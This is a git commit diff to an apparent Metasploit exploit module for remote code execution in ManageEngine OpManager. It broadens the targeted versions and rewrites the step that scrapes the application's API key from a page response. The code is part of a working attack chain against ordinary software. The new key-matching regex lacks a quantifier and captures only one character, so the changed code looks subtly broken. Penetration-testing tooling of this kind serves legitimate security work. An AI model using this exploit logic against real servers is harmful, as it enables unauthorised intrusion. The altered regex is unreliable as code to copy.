Updated with Egypt's suggestion, also changed the target name to include other versions

Sara Perez · Sara Perez · commit 18fa4111894c · 2017-04-27T13:19:44.000+01:00
diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb
@@ -40,7 +40,7 @@ module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
       'Arch'           => ARCH_JAVA,
       'Targets'        =>
         [
-          ['ManageEngine OpManager v11.6', {}]
+          ['ManageEngine OpManager <= v11.6', {}]
         ],
       'Privileged'     => false,
       'DisclosureDate' => 'Sep 14 2015',
@@ -121,14 +121,8 @@ def exploit
       'uri' => redirect,
       'method' => 'GET'
     })
-    if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
-      version = $1
-    else
-      fail_with(Failure::Unknown, "#{peer} - Could not gather the version in use")
-    end
 
-    if res && res.code == 200 && ((version == 11.6 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/) || (version == 11.0 && res.body =~ /window.apiKey = "([a-z0-9]+)"/))
-      # the line above checks for the version, as for version 11.0 the call for the api key value is different but the rest of the exploit works the same.
+    if res && res.code == 200 && res.body =~ /window.(?:OPM.)?apiKey = "([a-z0-9])"/
       api_key = $1
       print_status("Retrieved API key [ #{api_key} ]")
     else
